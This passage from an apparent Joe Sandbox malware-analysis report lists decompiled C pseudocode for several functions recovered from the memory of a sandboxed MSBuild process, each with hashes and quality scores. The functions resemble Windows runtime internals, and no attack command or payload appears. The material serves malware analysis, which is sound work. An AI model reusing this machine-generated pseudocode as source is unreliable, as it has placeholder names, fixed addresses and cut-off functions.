                                            						_t43 = E010D8D34(_v8, _t80);
                                            					}
                                            					E01022280(_t43, _t82);
                                            					if( *((char*)(_t80 + 0xdc)) == 0) {
                                            						E0101FFB0(_t62, _t80, _t82);
                                            						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                                            						_t30 = _t80 + 0xd0; // 0xd0
                                            						_t83 = _t30;
                                            						E010D8833(_t83,  &_v16);
                                            						_t81 = _t80 + 0x90;
                                            						E0101FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                                            						_t63 = 0;
                                            						_push(0);
                                            						_push(_t83);
                                            						_t48 = E0104B180();
                                            						if(_a4 != 0) {
                                            							E01022280(_t48, _t81);
                                            						}
                                            					} else {
                                            						_t69 = _v8;
                                            						_t12 = _t80 + 0x98; // 0x98
                                            						_t13 = _t69 + 0xc; // 0x575651ff
                                            						E0102BB2D(_t13, _t12);
                                            						_t71 = _v8;
                                            						_t15 = _t80 + 0xb0; // 0xb0
                                            						_t16 = _t71 + 8; // 0x8b000cc2
                                            						E0102BB2D(_t16, _t15);
                                            						E0102B944(_v8, _t62);
                                            						 *((char*)(_t80 + 0xdc)) = 0;
                                            						E0101FFB0(0, _t80, _t82);
                                            						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                                            						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                                            						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                                            						 *(_t80 + 0xde) = 0;
                                            						if(_a4 == 0) {
                                            							_t25 = _t80 + 0x90; // 0x90
                                            							E0101FFB0(0, _t80, _t25);
                                            						}
                                            						_t63 = 1;
                                            					}
                                            					return _t63;
                                            				}
                                            				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                                            				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                                            				if(_a4 == 0) {
                                            					_t24 = _t80 + 0x90; // 0x90
                                            					E0101FFB0(0, __ecx, _t24);
                                            				}
                                            				return 0;
                                            			}


                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                            • Instruction ID: 51237a6ce6411c159bc9271a2a9a535171166325c9338e8d538e7181fb98b89d
                                            • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                            • Instruction Fuzzy Hash: 72314871A01697BEE705EBB4C580BEDFBA4BF53204F14415AC49C47201DB786A49C7E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 76%
                                            			E01087016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                                            				signed int _v8;
                                            				char _v588;
                                            				intOrPtr _v592;
                                            				intOrPtr _v596;
                                            				signed short* _v600;
                                            				char _v604;
                                            				short _v606;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed short* _t55;
                                            				void* _t56;
                                            				signed short* _t58;
                                            				signed char* _t61;
                                            				char* _t68;
                                            				void* _t69;
                                            				void* _t71;
                                            				void* _t72;
                                            				signed int _t75;
                                            
                                            				_t64 = __edx;
                                            				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                                            				_v8 =  *0x10fd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                                            				_t55 = _a16;
                                            				_v606 = __ecx;
                                            				_t71 = 0;
                                            				_t58 = _a12;
                                            				_v596 = __edx;
                                            				_v600 = _t58;
                                            				_t68 =  &_v588;
                                            				if(_t58 != 0) {
                                            					_t71 = ( *_t58 & 0x0000ffff) + 2;
                                            					if(_t55 != 0) {
                                            						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                                            					}
                                            				}
                                            				_t8 = _t71 + 0x2a; // 0x28
                                            				_t33 = _t8;
                                            				_v592 = _t8;
                                            				if(_t71 <= 0x214) {
                                            					L6:
                                            					 *((short*)(_t68 + 6)) = _v606;
                                            					if(_t64 != 0xffffffff) {
                                            						asm("cdq");
                                            						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                                            						 *((char*)(_t68 + 0x28)) = _a4;
                                            						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                                            						 *((char*)(_t68 + 0x29)) = _a8;
                                            						if(_t71 != 0) {
                                            							_t22 = _t68 + 0x2a; // 0x2a
                                            							_t64 = _t22;
                                            							E01086B4C(_t58, _t22, _t71,  &_v604);
                                            							if(_t55 != 0) {
                                            								_t25 = _v604 + 0x2a; // 0x2a
                                            								_t64 = _t25 + _t68;
                                            								E01086B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                                            							}
                                            							if(E01027D50() == 0) {
                                            								_t61 = 0x7ffe0384;
                                            							} else {
                                            								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                            							}
                                            							_push(_t68);
                                            							_push(_v592 + 0xffffffe0);
                                            							_push(0x402);
                                            							_push( *_t61 & 0x000000ff);
                                            							E01049AE0();
                                            						}
                                            					}
                                            					_t35 =  &_v588;
                                            					if( &_v588 != _t68) {
                                            						_t35 = L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                                            					}
                                            					L16:
                                            					_pop(_t69);
                                            					_pop(_t72);
                                            					_pop(_t56);
                                            					return E0104B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                                            				}
                                            				_t68 = L01024620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                                            				if(_t68 == 0) {
                                            					goto L16;
                                            				} else {
                                            					_t58 = _v600;
                                            					_t64 = _v596;
                                            					goto L6;
                                            				}
                                            			}


                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7c2b4e1f0781a484fc3efbb8eb5c8a20fd501dc194c434a485dfec1d232e9131
                                            • Instruction ID: 790d8835b9a30aadd13d769e5864baa5e896851204221ffaf0153b16a17be71f
                                            • Opcode Fuzzy Hash: 7c2b4e1f0781a484fc3efbb8eb5c8a20fd501dc194c434a485dfec1d232e9131
                                            • Instruction Fuzzy Hash: 0F31C6726087519BC720EF2CC840AAAB7E5FF98700F144A69F9D587795E730E904CBA6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 70%
                                            			E010B3D40(intOrPtr __ecx, char* __edx) {
                                            				signed int _v8;
                                            				char* _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				signed char _v24;
                                            				char _v28;
                                            				char _v29;
                                            				intOrPtr* _v32;
                                            				char _v36;
                                            				char _v37;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed char _t34;
                                            				intOrPtr* _t37;
                                            				intOrPtr* _t42;
                                            				intOrPtr* _t47;
                                            				intOrPtr* _t48;
                                            				intOrPtr* _t49;
                                            				char _t51;
                                            				void* _t52;
                                            				intOrPtr* _t53;
                                            				char* _t55;
                                            				char _t59;
                                            				char* _t61;
                                            				intOrPtr* _t64;
                                            				void* _t65;
                                            				char* _t67;
                                            				void* _t68;
                                            				signed int _t70;
                                            
                                            				_t62 = __edx;
                                            				_t72 = (_t70 & 0xfffffff8) - 0x1c;
                                            				_v8 =  *0x10fd360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
                                            				_t34 =  &_v28;
                                            				_v20 = __ecx;
                                            				_t67 = __edx;
                                            				_v24 = _t34;
                                            				_t51 = 0;
                                            				_v12 = __edx;
                                            				_v29 = 0;
                                            				_v28 = _t34;
                                            				E01022280(_t34, 0x10f8a6c);
                                            				_t64 =  *0x10f5768; // 0x771a5768
                                            				if(_t64 != 0x10f5768) {
                                            					while(1) {
                                            						_t8 = _t64 + 8; // 0x771a5770
                                            						_t42 = _t8;
                                            						_t53 = _t64;
                                            						 *_t42 =  *_t42 + 1;
                                            						_v16 = _t42;
                                            						E0101FFB0(_t53, _t64, 0x10f8a6c);
                                            						 *0x10fb1e0(_v24, _t67);
                                            						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
                                            							_v37 = 1;
                                            						}
                                            						E01022280(_t45, 0x10f8a6c);
                                            						_t47 = _v28;
                                            						_t64 =  *_t64;
                                            						 *_t47 =  *_t47 - 1;
                                            						if( *_t47 != 0) {
                                            							goto L8;
                                            						}
                                            						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
                                            							L10:
                                            							_push(3);
                                            							asm("int 0x29");
                                            						} else {
                                            							_t48 =  *((intOrPtr*)(_t53 + 4));
                                            							if( *_t48 != _t53) {
                                            								goto L10;
                                            							} else {
                                            								 *_t48 = _t64;
                                            								_t61 =  &_v36;
                                            								 *((intOrPtr*)(_t64 + 4)) = _t48;
                                            								_t49 = _v32;
                                            								if( *_t49 != _t61) {
                                            									goto L10;
                                            								} else {
                                            									 *_t53 = _t61;
                                            									 *((intOrPtr*)(_t53 + 4)) = _t49;
                                            									 *_t49 = _t53;
                                            									_v32 = _t53;
                                            									goto L8;
                                            								}
                                            							}
                                            						}
                                            						L11:
                                            						_t51 = _v29;
                                            						goto L12;
                                            						L8:
                                            						if(_t64 != 0x10f5768) {
                                            							_t67 = _v20;
                                            							continue;
                                            						}
                                            						goto L11;
                                            					}
                                            				}
                                            				L12:
                                            				E0101FFB0(_t51, _t64, 0x10f8a6c);
                                            				while(1) {
                                            					_t37 = _v28;
                                            					_t55 =  &_v28;
                                            					if(_t37 == _t55) {
                                            						break;
                                            					}
                                            					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
                                            						goto L10;
                                            					} else {
                                            						_t59 =  *_t37;
                                            						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
                                            							goto L10;
                                            						} else {
                                            							_t62 =  &_v28;
                                            							_v28 = _t59;
                                            							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
                                            							L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
                                            							continue;
                                            						}
                                            					}
                                            					L18:
                                            				}
                                            				_pop(_t65);
                                            				_pop(_t68);
                                            				_pop(_t52);
                                            				return E0104B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
                                            				goto L18;
                                            			}


                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 45546bd76357e0e2ac65d4030d3d16515367ac3f41c726b0bc738c9347e85b22
                                            • Instruction ID: c1e7bdc3b7d172bb7c9e26a48c5b0fa7296f1cf653a4fc2ac31b5fe32ff47412
                                            • Opcode Fuzzy Hash: 45546bd76357e0e2ac65d4030d3d16515367ac3f41c726b0bc738c9347e85b22
                                            • Instruction Fuzzy Hash: 74317971509302DFC714DF18D58299ABBE1FF85704F1989AEE5D89F681D730E908CBA2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 92%
                                            			E0103A70E(intOrPtr* __ecx, char* __edx) {
                                            				unsigned int _v8;
                                            				intOrPtr* _v12;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* _t16;
                                            				intOrPtr _t17;
                                            				intOrPtr _t28;
                                            				char* _t33;
                                            				intOrPtr _t37;
                                            				intOrPtr _t38;
                                            				void* _t50;
                                            				intOrPtr _t52;
                                            
                                            				_push(__ecx);
                                            				_push(__ecx);
                                            				_t52 =  *0x10f7b10; // 0x0
                                            				_t33 = __edx;
                                            				_t48 = __ecx;
                                            				_v12 = __ecx;
                                            				if(_t52 == 0) {
                                            					 *0x10f7b10 = 8;
                                            					 *0x10f7b14 = 0x10f7b0c;
                                            					 *0x10f7b18 = 1;
                                            					L6:
                                            					_t2 = _t52 + 1; // 0x1
                                            					E0103A990(0x10f7b10, _t2, 7);
                                            					asm("bts ecx, eax");
                                            					 *_t48 = _t52;
                                            					 *_t33 = 1;
                                            					L3:
                                            					_t16 = 0;
                                            					L4:
                                            					return _t16;
                                            				}
                                            				_t17 = L0103A840(__edx, __ecx, __ecx, _t52, 0x10f7b10, 1, 0);
                                            				if(_t17 == 0xffffffff) {
                                            					_t37 =  *0x10f7b10; // 0x0
                                            					_t3 = _t37 + 0x27; // 0x27
                                            					__eflags = _t3 >> 5 -  *0x10f7b18; // 0x0
                                            					if(__eflags > 0) {
                                            						_t38 =  *0x10f7b9c; // 0x0
                                            						_t4 = _t52 + 0x27; // 0x27
                                            						_v8 = _t4 >> 5;
                                            						_t50 = L01024620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                                            						__eflags = _t50;
                                            						if(_t50 == 0) {
                                            							_t16 = 0xc0000017;
                                            							goto L4;
                                            						}
                                            						 *0x10f7b18 = _v8;
                                            						_t8 = _t52 + 7; // 0x7
                                            						E0104F3E0(_t50,  *0x10f7b14, _t8 >> 3);
                                            						_t28 =  *0x10f7b14; // 0x0
                                            						__eflags = _t28 - 0x10f7b0c;
                                            						if(_t28 != 0x10f7b0c) {
                                            							L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                            						}
                                            						_t9 = _t52 + 8; // 0x8
                                            						 *0x10f7b14 = _t50;
                                            						_t48 = _v12;
                                            						 *0x10f7b10 = _t9;
                                            						goto L6;
                                            					}
                                            					 *0x10f7b10 = _t37 + 8;
                                            					goto L6;
                                            				}
                                            				 *__ecx = _t17;
                                            				 *_t33 = 0;
                                            				goto L3;
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a4bb189fb9938f82003fdae1c1e44ed8e9500800d58f3dcdee92f2557dc15cc8
                                            • Instruction ID: f66a93cc4a8262c18800196715854f58a17fd5f13a178bd620c67ee10d94121d
                                            • Opcode Fuzzy Hash: a4bb189fb9938f82003fdae1c1e44ed8e9500800d58f3dcdee92f2557dc15cc8
                                            • Instruction Fuzzy Hash: 4631C1B1700209DBC721CB08DCA2F6A7BF9FB86710F54095EE2C5C7A44D3BA9901CB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 97%
                                            			E010361A0(signed int* __ecx) {
                                            				intOrPtr _v8;
                                            				char _v12;
                                            				intOrPtr* _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _t30;
                                            				intOrPtr _t31;
                                            				void* _t32;
                                            				intOrPtr _t33;
                                            				intOrPtr _t37;
                                            				intOrPtr _t49;
                                            				signed int _t51;
                                            				intOrPtr _t52;
                                            				signed int _t54;
                                            				void* _t59;
                                            				signed int* _t61;
                                            				intOrPtr* _t64;
                                            
                                            				_t61 = __ecx;
                                            				_v12 = 0;
                                            				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                            				_v16 = __ecx;
                                            				_v8 = 0;
                                            				if(_t30 == 0) {
                                            					L6:
                                            					_t31 = 0;
                                            					L7:
                                            					return _t31;
                                            				}
                                            				_t32 = _t30 + 0x5d8;
                                            				if(_t32 == 0) {
                                            					goto L6;
                                            				}
                                            				_t59 = _t32 + 0x30;
                                            				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                                            					goto L6;
                                            				}
                                            				if(__ecx != 0) {
                                            					 *((intOrPtr*)(__ecx)) = 0;
                                            					 *((intOrPtr*)(__ecx + 4)) = 0;
                                            				}
                                            				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                                            					_t51 =  *(_t32 + 0x10);
                                            					_t33 = _t32 + 0x10;
                                            					_v20 = _t33;
                                            					_t54 =  *(_t33 + 4);
                                            					if((_t51 | _t54) == 0) {
                                            						_t37 = E01035E50(0xfe67cc, 0, 0,  &_v12);
                                            						if(_t37 != 0) {
                                            							goto L6;
                                            						}
                                            						_t52 = _v8;
                                            						asm("lock cmpxchg8b [esi]");
                                            						_t64 = _v16;
                                            						_t49 = _t37;
                                            						_v20 = 0;
                                            						if(_t37 == 0) {
                                            							if(_t64 != 0) {
                                            								 *_t64 = _v12;
                                            								 *((intOrPtr*)(_t64 + 4)) = _t52;
                                            							}
                                            							E010D9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                                            							_t31 = 1;
                                            							goto L7;
                                            						}
                                            						E0100F7C0(_t52, _v12, _t52, 0);
                                            						if(_t64 != 0) {
                                            							 *_t64 = _t49;
                                            							 *((intOrPtr*)(_t64 + 4)) = _v20;
                                            						}
                                            						L12:
                                            						_t31 = 1;
                                            						goto L7;
                                            					}
                                            					if(_t61 != 0) {
                                            						 *_t61 = _t51;
                                            						_t61[1] = _t54;
                                            					}
                                            					goto L12;
                                            				} else {
                                            					goto L6;
                                            				}
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 63378e6c5a66b36ed8f9bae72735346a9fbfb66e98d9fccb330bb52f07fca98d
                                            • Instruction ID: 47567a8aa1a3af1222105923822657a23c8afa30b23cc3a2c6316a61ddc0dffa
                                            • Opcode Fuzzy Hash: 63378e6c5a66b36ed8f9bae72735346a9fbfb66e98d9fccb330bb52f07fca98d
                                            • Instruction Fuzzy Hash: D4316B71A057019FE3A0CF1DC804B2ABBE8FB88B44F0949ADE9D89B251E771D904CB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 95%
                                            			E0100AA16(signed short* __ecx) {
                                            				signed int _v8;
                                            				intOrPtr _v12;
                                            				signed short _v16;
                                            				intOrPtr _v20;
                                            				signed short _v24;
                                            				signed short _v28;
                                            				void* _v32;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				intOrPtr _t25;
                                            				signed short _t38;
                                            				signed short* _t42;
                                            				signed int _t44;
                                            				signed short* _t52;
                                            				signed short _t53;
                                            				signed int _t54;
                                            
                                            				_v8 =  *0x10fd360 ^ _t54;
                                            				_t42 = __ecx;
                                            				_t44 =  *__ecx & 0x0000ffff;
                                            				_t52 =  &(__ecx[2]);
                                            				_t51 = _t44 + 2;
                                            				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                                            					L4:
                                            					_t25 =  *0x10f7b9c; // 0x0
                                            					_t53 = L01024620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                                            					__eflags = _t53;
                                            					if(_t53 == 0) {
                                            						L3:
                                            						return E0104B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                                            					} else {
                                            						E0104F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                                            						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                                            						L2:
                                            						_t51 = 4;
                                            						if(L01016C59(_t53, _t51, _t58) != 0) {
                                            							_t28 = E01035E50(0xfec338, 0, 0,  &_v32);
                                            							__eflags = _t28;
                                            							if(_t28 == 0) {
                                            								_t38 = ( *_t42 & 0x0000ffff) + 2;
                                            								__eflags = _t38;
                                            								_v24 = _t53;
                                            								_v16 = _t38;
                                            								_v20 = 0;
                                            								_v12 = 0;
                                            								E0103B230(_v32, _v28, 0xfec2d8, 1,  &_v24);
                                            								_t28 = E0100F7A0(_v32, _v28);
                                            							}
                                            							__eflags = _t53 -  *_t52;
                                            							if(_t53 !=  *_t52) {
                                            								_t28 = L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                            							}
                                            						}
                                            						goto L3;
                                            					}
                                            				}
                                            				_t53 =  *_t52;
                                            				_t44 = _t44 >> 1;
                                            				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                                            				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                                            					goto L4;
                                            				}
                                            				goto L2;
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8768b10c109b7fa023fd0af8f29c965e2c1b1a437b47d247457d01c01497a7fc
                                            • Instruction ID: 74f3fe7111ee6939d69a2f54ac3e70ac7620f24bb0125cd887271e5d8bbde1af
                                            • Opcode Fuzzy Hash: 8768b10c109b7fa023fd0af8f29c965e2c1b1a437b47d247457d01c01497a7fc
                                            • Instruction Fuzzy Hash: 1A31E371A0021AEBDB159F68CD82ABFB7B8FF48700F014069F981E7180EB759951DBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 58%
                                            			E01044A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                                            				signed int _v8;
                                            				signed int* _v12;
                                            				char _v13;
                                            				signed int _v16;
                                            				char _v21;
                                            				signed int* _v24;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed int _t29;
                                            				signed int* _t32;
                                            				signed int* _t41;
                                            				signed int _t42;
                                            				void* _t43;
                                            				intOrPtr* _t51;
                                            				void* _t52;
                                            				signed int _t53;
                                            				signed int _t58;
                                            				void* _t59;
                                            				signed int _t60;
                                            				signed int _t62;
                                            
                                            				_t49 = __edx;
                                            				_t62 = (_t60 & 0xfffffff8) - 0xc;
                                            				_t26 =  *0x10fd360 ^ _t62;
                                            				_v8 =  *0x10fd360 ^ _t62;
                                            				_t41 = __ecx;
                                            				_t51 = __edx;
                                            				_v12 = __ecx;
                                            				if(_a4 == 0) {
                                            					if(_a8 != 0) {
                                            						goto L1;
                                            					}
                                            					_v13 = 1;
                                            					E01022280(_t26, 0x10f8608);
                                            					_t58 =  *_t41;
                                            					if(_t58 == 0) {
                                            						L11:
                                            						E0101FFB0(_t41, _t51, 0x10f8608);
                                            						L2:
                                            						 *0x10fb1e0(_a4, _a8);
                                            						_t42 =  *_t51();
                                            						if(_t42 == 0) {
                                            							_t29 = 0;
                                            							L5:
                                            							_pop(_t52);
                                            							_pop(_t59);
                                            							_pop(_t43);
                                            							return E0104B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                                            						}
                                            						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                                            						if(_v21 != 0) {
                                            							_t53 = 0;
                                            							E01022280(_t28, 0x10f8608);
                                            							_t32 = _v24;
                                            							if( *_t32 == _t58) {
                                            								 *_t32 = _t42;
                                            								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                                            								if(_t58 != 0) {
                                            									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                                            									asm("sbb edi, edi");
                                            									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                                            								}
                                            							}
                                            							E0101FFB0(_t42, _t53, 0x10f8608);
                                            							if(_t53 != 0) {
                                            								L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                            							}
                                            						}
                                            						_t29 = _t42;
                                            						goto L5;
                                            					}
                                            					if( *((char*)(_t58 + 0x40)) != 0) {
                                            						L10:
                                            						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                                            						E0101FFB0(_t41, _t51, 0x10f8608);
                                            						_t29 = _t58;
                                            						goto L5;
                                            					}
                                            					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                            					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                            						goto L11;
                                            					}
                                            					goto L10;
                                            				}
                                            				L1:
                                            				_v13 = 0;
                                            				_t58 = 0;
                                            				goto L2;
                                            			}

























                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E01048EC7(void* __ecx, void* __edx) {
                                            				signed int _v8;
                                            				signed int* _v16;
                                            				intOrPtr _v20;
                                            				signed int* _v24;
                                            				char* _v28;
                                            				signed int* _v32;
                                            				intOrPtr _v36;
                                            				signed int* _v40;
                                            				signed int* _v44;
                                            				signed int* _v48;
                                            				intOrPtr _v52;
                                            				signed int* _v56;
                                            				signed int* _v60;
                                            				signed int* _v64;
                                            				intOrPtr _v68;
                                            				signed int* _v72;
                                            				char* _v76;
                                            				signed int* _v80;
                                            				signed int _v84;
                                            				signed int* _v88;
                                            				intOrPtr _v92;
                                            				signed int* _v96;
                                            				intOrPtr _v100;
                                            				signed int* _v104;
                                            				signed int* _v108;
                                            				char _v140;
                                            				signed int _v144;
                                            				signed int _v148;
                                            				signed int* _v152;
                                            				char _v156;
                                            				signed int* _v160;
                                            				char _v164;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* _t67;
                                            				intOrPtr _t70;
                                            				void* _t71;
                                            				void* _t72;
                                            				signed int _t73;
                                            
                                            				_t69 = __edx;
                                            				_v8 =  *0x10fd360 ^ _t73;
                                            				_t48 =  *[fs:0x30];
                                            				_t72 = __edx;
                                            				_t71 = __ecx;
                                            				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                                            					_t48 = E01034E70(0x10f86e4, 0x1049490, 0, 0);
                                            					if( *0x10f53e8 > 5 && E01048F33(0x10f53e8, 0, 0x2000) != 0) {
                                            						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                                            						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                                            						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                                            						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                                            						_v108 =  &_v84;
                                            						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                                            						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                                            						_v76 =  &_v156;
                                            						_t70 = 8;
                                            						_v60 =  &_v144;
                                            						_t67 = 4;
                                            						_v44 =  &_v148;
                                            						_v152 = 0;
                                            						_v160 = 0;
                                            						_v104 = 0;
                                            						_v100 = 2;
                                            						_v96 = 0;
                                            						_v88 = 0;
                                            						_v80 = 0;
                                            						_v72 = 0;
                                            						_v68 = _t70;
                                            						_v64 = 0;
                                            						_v56 = 0;
                                            						_v52 = 0x10f53e8;
                                            						_v48 = 0;
                                            						_v40 = 0;
                                            						_v36 = 0x10f53e8;
                                            						_v32 = 0;
                                            						_v28 =  &_v164;
                                            						_v24 = 0;
                                            						_v20 = _t70;
                                            						_v16 = 0;
                                            						_t69 = 0xfebc46;
                                            						_t48 = E01087B9C(0x10f53e8, 0xfebc46, _t67, 0x10f53e8, _t70,  &_v140);
                                            					}
                                            				}
                                            				return E0104B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                                            			}












































                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 74%
                                            			E0103E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                                            				intOrPtr* _v0;
                                            				signed char _v4;
                                            				signed int _v8;
                                            				void* __ecx;
                                            				void* __ebp;
                                            				void* _t37;
                                            				intOrPtr _t38;
                                            				signed int _t44;
                                            				signed char _t52;
                                            				void* _t54;
                                            				intOrPtr* _t56;
                                            				void* _t58;
                                            				char* _t59;
                                            				signed int _t62;
                                            
                                            				_t58 = __edx;
                                            				_push(0);
                                            				_push(4);
                                            				_push( &_v8);
                                            				_push(0x24);
                                            				_push(0xffffffff);
                                            				if(E01049670() < 0) {
                                            					L0105DF30(_t54, _t58, _t35);
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					_push(_t54);
                                            					_t52 = _v4;
                                            					if(_t52 > 8) {
                                            						_t37 = 0xc0000078;
                                            					} else {
